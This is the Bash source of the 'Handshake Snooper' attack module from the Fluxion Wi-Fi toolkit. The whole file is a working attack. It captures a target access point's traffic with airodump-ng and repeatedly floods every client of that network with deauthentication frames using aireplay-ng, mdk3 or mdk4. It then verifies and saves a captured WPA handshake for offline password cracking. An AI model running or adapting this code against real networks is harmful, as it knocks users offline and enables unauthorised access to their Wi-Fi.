fluxion/attacks/Handshake Snooper/attack.sh

502 lines
17 KiB
Bash
Executable File

#!/usr/bin/env bash
# ============================================================ #
# ============= < Handshake Snooper Parameters > ============= #
# ============================================================ #
HandshakeSnooperState="Not Ready"
# ============================================================ #
# ========= < Handshake Snooper Helper Subroutines > ========= #
# ============================================================ #
handshake_snooper_header() {
fluxion_header; fluxion_target_show; echo
}
# ============================================================ #
# ============= < Handshake Snooper Subroutines > ============ #
# ============================================================ #
handshake_snooper_arbiter_daemon() {
if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then
return 1;
fi
# Start daemon in the running state to continue execution until aborted,
# or until a hash has been verified to exist in the capture file.
# NOTE: The line below must remain before trap to prevent race conditions.
local handshake_snooper_arbiter_daemon_state="running"
handshake_snooper_arbiter_daemon_abort() {
handshake_snooper_arbiter_daemon_state="aborted"
if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then
kill $handshake_snooper_arbiter_daemon_viewerPID
fi
handshake_snooper_stop_deauthenticator
handshake_snooper_stop_captor
local -r now=$(env -i date '+%H:%M:%S')
echo -e "[$now] $HandshakeSnooperArbiterAbortedWarning" >> \
"$FLUXIONWorkspacePath/handshake_snooper.log"
exit 2
}
trap handshake_snooper_arbiter_daemon_abort SIGABRT
source "$FLUXIONLibPath/HashUtils.sh"
source "$FLUXIONLibPath/ColorUtils.sh"
# Cleanup files we've previously created to avoid conflicts.
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*"
# Display some feedback to the user to assure verifier is working.
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" \
-title "Handshake Snooper Arbiter Log" -e \
"tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" &
local handshake_snooper_arbiter_daemon_viewerPID=$!
local now=$(env -i date '+%H:%M:%S')
echo -e "[$now] $HandshakeSnooperStartingArbiterNotice" > \
"$FLUXIONWorkspacePath/handshake_snooper.log"
handshake_snooper_start_captor
handshake_snooper_start_deauthenticator
local handshake_snooper_arbiter_daemon_verified=1 # Assume it hasn't been verified yet (1 => false/error).
# Keep snooping and verifying until we've got a valid hash from the capture file.
while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do
now=$(env -i date '+%H:%M:%S')
echo -e "[$now] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >> \
"$FLUXIONWorkspacePath/handshake_snooper.log"
sleep $HandshakeSnooperVerifierInterval &
wait $! # Using wait to asynchronously catch flags while waiting.
# If synchronously searching, stop the captor and deauthenticator before checking.
if [ "$HandshakeSnooperVerifierSynchronicity" = "blocking" ]; then
now=$(env -i date '+%H:%M:%S')
echo -e "[$now] $HandshakeSnooperStoppingForVerifierNotice" >> \
"$FLUXIONWorkspacePath/handshake_snooper.log"
handshake_snooper_stop_deauthenticator
handshake_snooper_stop_captor
mv "$FLUXIONWorkspacePath/capture/dump-01.cap" \
"$FLUXIONWorkspacePath/capture/recent.cap"
else
pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" \
-o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> \
$FLUXIONOutputDevice
fi
now=$(env -i date '+%H:%M:%S')
echo -e "[$now] $HandshakeSnooperSearchingForHashesNotice" >> \
"$FLUXIONWorkspacePath/handshake_snooper.log"
hash_check_handshake "$HandshakeSnooperVerifierIdentifier" \
"$FLUXIONWorkspacePath/capture/recent.cap" \
"$FluxionTargetSSID" "$FluxionTargetMAC"
handshake_snooper_arbiter_daemon_verified=$?
# If synchronously searching, restart the captor and deauthenticator after checking.
if [ "$HandshakeSnooperVerifierSynchronicity" = "blocking" -a \
$handshake_snooper_arbiter_daemon_verified -ne 0 ]; then
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*"
handshake_snooper_start_captor
handshake_snooper_start_deauthenticator
fi
done
# Assure all processes are stopped before proceeding.
handshake_snooper_stop_deauthenticator
handshake_snooper_stop_captor
local completionTime=$(env -i date '+%H:%M:%S')
echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >> \
"$FLUXIONWorkspacePath/handshake_snooper.log"
echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >> \
"$FLUXIONWorkspacePath/handshake_snooper.log"
# Assure we've got a directory to store hashes into.
mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/"
# Move handshake to storage if one was acquired.
mv "$FLUXIONWorkspacePath/capture/recent.cap" \
"$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap"
# Signal parent process the verification terminated.
kill -s SIGABRT $1
}
handshake_snooper_stop_captor() {
if [ "$HandshakeSnooperCaptorPID" ]; then
kill -s SIGINT $HandshakeSnooperCaptorPID &> $FLUXIONOutputDevice
fi
HandshakeSnooperCaptorPID=""
}
handshake_snooper_start_captor() {
if [ "$HandshakeSnooperCaptorPID" ]; then return 0; fi
if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi
handshake_snooper_stop_captor
xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $FluxionTargetChannel)" \
$TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \
airodump-ng --ignore-negative-one -d $FluxionTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $FluxionTargetChannel -a $HandshakeSnooperJammerInterface &
local parentPID=$!
while [ ! "$HandshakeSnooperCaptorPID" ]; do
sleep 1 &
wait $!
HandshakeSnooperCaptorPID=$(pgrep -P $parentPID)
done
}
handshake_snooper_stop_deauthenticator() {
if [ "$HandshakeSnooperDeauthenticatorPID" ]; then
kill $HandshakeSnooperDeauthenticatorPID &> $FLUXIONOutputDevice
fi
HandshakeSnooperDeauthenticatorPID=""
}
handshake_snooper_start_deauthenticator() {
if [ "$HandshakeSnooperDeauthenticatorPID" ]; then return 0; fi
if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi
handshake_snooper_stop_deauthenticator
# Prepare deauthenticators
case "$HandshakeSnooperDeauthenticatorIdentifier" in
"$HandshakeSnooperMdk3MethodOption")
echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;;
esac
# Start deauthenticators.
case "$HandshakeSnooperDeauthenticatorIdentifier" in
"$HandshakeSnooperAireplayMethodOption")
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
-title "Deauthenticating all clients on $FluxionTargetSSID" -e \
"while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" &
HandshakeSnooperDeauthenticatorPID=$!
;;
"$HandshakeSnooperMdk3MethodOption")
if ! [ -x "$(command -v mdk4)" ];then
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
-title "Deauthenticating all clients on $FluxionTargetSSID" -e \
"while true; do sleep 7; timeout 3 mdk3 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" &
HandshakeSnooperDeauthenticatorPID=$!
else
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \
-title "Deauthenticating all clients on $FluxionTargetSSID" -e \
"while true; do sleep 7; timeout 3 mdk4 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" &
HandshakeSnooperDeauthenticatorPID=$!
fi
;;
esac
}
handshake_snooper_unset_deauthenticator_identifier() {
if [ ! "$HandshakeSnooperDeauthenticatorIdentifier" ]; then return 1; fi
HandshakeSnooperDeauthenticatorIdentifier=""
}
handshake_snooper_set_deauthenticator_identifier() {
if [ "$HandshakeSnooperDeauthenticatorIdentifier" ]; then return 0; fi
handshake_snooper_unset_deauthenticator_identifier
local methods=(
"$HandshakeSnooperMonitorMethodOption"
"$HandshakeSnooperAireplayMethodOption"
"$HandshakeSnooperMdk3MethodOption"
"$FLUXIONGeneralBackOption"
)
io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
HandshakeSnooperDeauthenticatorIdentifier=$IOQueryChoice
echo
if [ "$HandshakeSnooperDeauthenticatorIdentifier" = \
"$FLUXIONGeneralBackOption" ]; then
handshake_snooper_unset_deauthenticator_identifier
return 1
fi
}
handshake_snooper_unset_jammer_interface() {
HandshakeSnooperJammerInterfaceOriginal=""
if [ ! "$HandshakeSnooperJammerInterface" ]; then return 1; fi
HandshakeSnooperJammerInterface=""
# Check if we're automatically selecting the interface & skip
# this one if so to take the user back properly.
local interfacesAvailable
readarray -t interfacesAvailable < <(attack_targetting_interfaces)
if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi
}
handshake_snooper_set_jammer_interface() {
if [ "$HandshakeSnooperJammerInterface" ]; then return 0; fi
# NOTICE: The code below should be excluded because the interface selected
# below is also being used as the monitoring interface (required)!
#if [ "$HandshakeSnooperDeauthenticatorIdentifier" = \
# "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi
if [ ! "$HandshakeSnooperJammerInterfaceOriginal" ]; then
echo "Running get jammer interface." > $FLUXIONOutputDevice
if ! fluxion_get_interface attack_targetting_interfaces \
"$HandshakeSnooperJammerInterfaceQuery"; then
echo "Failed to get jammer interface" > $FLUXIONOutputDevice
return 1
fi
HandshakeSnooperJammerInterfaceOriginal=$FluxionInterfaceSelected
fi
local selectedInterface=$HandshakeSnooperJammerInterfaceOriginal
if ! fluxion_allocate_interface $selectedInterface; then
echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice
return 2
fi
echo "Succeeded get jammer interface." > $FLUXIONOutputDevice
HandshakeSnooperJammerInterface=${FluxionInterfaces[$selectedInterface]}
}
handshake_snooper_unset_verifier_identifier() {
if [ ! "$HandshakeSnooperVerifierIdentifier" ]; then return 1; fi
HandshakeSnooperVerifierIdentifier=""
}
handshake_snooper_set_verifier_identifier() {
if [ "$HandshakeSnooperVerifierIdentifier" ]; then return 0; fi
handshake_snooper_unset_verifier_identifier
local choices=(
"$FLUXIONHashVerificationMethodPyritOption"
"$FLUXIONHashVerificationMethodAircrackOption"
"$FLUXIONHashVerificationMethodCowpattyOption"
"$FLUXIONGeneralBackOption"
)
io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@]
echo
case "$IOQueryChoice" in
"$FLUXIONHashVerificationMethodPyritOption")
HandshakeSnooperVerifierIdentifier="pyrit" ;;
"$FLUXIONHashVerificationMethodAircrackOption")
HandshakeSnooperVerifierIdentifier="aircrack-ng" ;;
"$FLUXIONHashVerificationMethodCowpattyOption")
HandshakeSnooperVerifierIdentifier="cowpatty" ;;
"$FLUXIONGeneralBackOption")
handshake_snooper_unset_verifier_identifier
return 1
;;
esac
}
handshake_snooper_unset_verifier_interval() {
if [ ! "$HandshakeSnooperVerifierInterval" ]; then return 1; fi
HandshakeSnooperVerifierInterval=""
}
handshake_snooper_set_verifier_interval() {
if [ "$HandshakeSnooperVerifierInterval" ]; then return 0; fi
handshake_snooper_unset_verifier_interval
local choices=("$HandshakeSnooperVerifierInterval30SOption" "$HandshakeSnooperVerifierInterval60SOption" "$HandshakeSnooperVerifierInterval90SOption" "$FLUXIONGeneralBackOption")
io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@]
case "$IOQueryChoice" in
"$HandshakeSnooperVerifierInterval30SOption")
HandshakeSnooperVerifierInterval=30 ;;
"$HandshakeSnooperVerifierInterval60SOption")
HandshakeSnooperVerifierInterval=60 ;;
"$HandshakeSnooperVerifierInterval90SOption")
HandshakeSnooperVerifierInterval=90 ;;
"$FLUXIONGeneralBackOption")
handshake_snooper_unset_verifier_interval
return 1
;;
esac
}
handshake_snooper_unset_verifier_synchronicity() {
if [ ! "$HandshakeSnooperVerifierSynchronicity" ]; then return 1; fi
HandshakeSnooperVerifierSynchronicity=""
}
handshake_snooper_set_verifier_synchronicity() {
if [ "$HandshakeSnooperVerifierSynchronicity" ]; then return 0; fi
handshake_snooper_unset_verifier_synchronicity
local choices=(
"$HandshakeSnooperVerifierSynchronicityAsynchronousOption"
"$HandshakeSnooperVerifierSynchronicitySynchronousOption"
"$FLUXIONGeneralBackOption"
)
io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@]
case "$IOQueryChoice" in
"$HandshakeSnooperVerifierSynchronicityAsynchronousOption")
HandshakeSnooperVerifierSynchronicity="non-blocking" ;;
"$HandshakeSnooperVerifierSynchronicitySynchronousOption")
HandshakeSnooperVerifierSynchronicity="blocking" ;;
"$FLUXIONGeneralBackOption")
handshake_snooper_unset_verifier_synchronicity
return 1
;;
esac
}
# ============================================================ #
# =================== < Parse Parameters > =================== #
# ============================================================ #
if [ ! "$HandshakeSnooperCLIArguments" ]; then
if ! HandshakeSnooperCLIArguments=$(
getopt --options="v:i:j:a" \
--longoptions="verifier:,interval:,jammer:,asynchronous" \
--name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@"
);then
echo -e "${CRed}Aborted$CClr, parameter error detected..."
sleep 5
fluxion_handle_exit
fi
declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments
eval set -- "$HandshakeSnooperCLIArguments" # Set environment parameters.
fi
# ============================================================ #
# ============= < Argument Loaded Configurables > ============ #
# ============================================================ #
while [ "$1" != "" -a "$1" != "--" ]; do
case "$1" in
-v|--verifier)
HandshakeSnooperVerifierIdentifier=$2; shift;;
-i|--interval)
HandshakeSnooperVerifierInterval=$2; shift;;
-j|--jammer)
HandshakeSnooperJammerInterfaceOriginal=$2; shift;;
-a|--asynchronous)
HandshakeSnooperVerifierSynchronicity="non-blocking";;
esac
shift # Shift new parameters
done
# ============================================================ #
# ===================== < Fluxion Hooks > ==================== #
# ============================================================ #
attack_targetting_interfaces() {
interface_list_wireless
local interface
for interface in "${InterfaceListWireless[@]}"; do
echo "$interface"
done
}
attack_tracking_interfaces() {
interface_list_wireless
local interface
for interface in "${InterfaceListWireless[@]}"; do
echo "$interface"
done
echo "" # This enables the Skip option.
}
unprep_attack() {
HandshakeSnooperState="Not Ready"
handshake_snooper_unset_verifier_synchronicity
handshake_snooper_unset_verifier_interval
handshake_snooper_unset_verifier_identifier
handshake_snooper_unset_jammer_interface
handshake_snooper_unset_deauthenticator_identifier
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
}
prep_attack() {
mkdir -p "$FLUXIONWorkspacePath/capture"
IOUtilsHeader="handshake_snooper_header"
# Removed read-only due to local constant shadowing bug.
# I've reported the bug, we can add it when fixed.
local sequence=(
"set_deauthenticator_identifier"
"set_jammer_interface"
"set_verifier_identifier"
"set_verifier_interval"
"set_verifier_synchronicity"
)
if ! fluxion_do_sequence handshake_snooper sequence[@]; then
return 1
fi
HandshakeSnooperState="Ready"
}
load_attack() {
local -r configurationPath=$1
local configuration
readarray -t configuration < <(more "$configurationPath")
HandshakeSnooperDeauthenticatorIdentifier=${configuration[0]}
HandshakeSnooperJammerInterfaceOriginal=${configuration[1]}
HandshakeSnooperVerifierIdentifier=${configuration[2]}
HandshakeSnooperVerifierInterval=${configuration[3]}
HandshakeSnooperVerifierSynchronicity=${configuration[4]}
}
save_attack() {
local -r configurationPath=$1
# Store/overwrite attack configuration for pause & resume.
# Order: DeauthID, JammerWI, VerifId, VerifInt, VerifSync
echo "$HandshakeSnooperDeauthenticatorIdentifier" > "$configurationPath"
echo "$HandshakeSnooperJammerInterfaceOriginal" >> "$configurationPath"
echo "$HandshakeSnooperVerifierIdentifier" >> "$configurationPath"
echo "$HandshakeSnooperVerifierInterval" >> "$configurationPath"
echo "$HandshakeSnooperVerifierSynchronicity" >> "$configurationPath"
}
stop_attack() {
if [ "$HandshakeSnooperArbiterPID" ]; then
kill -s SIGABRT $HandshakeSnooperArbiterPID &> $FLUXIONOutputDevice
fi
HandshakeSnooperArbiterPID=""
HandshakeSnooperState="Stopped"
}
start_attack() {
if [ "$HandshakeSnooperState" = "Running" ]; then return 0; fi
if [ "$HandshakeSnooperState" != "Ready" ]; then return 1; fi
HandshakeSnooperState="Running"
handshake_snooper_arbiter_daemon $$ &> $FLUXIONOutputDevice &
HandshakeSnooperArbiterPID=$!
}
# FLUXSCRIPT END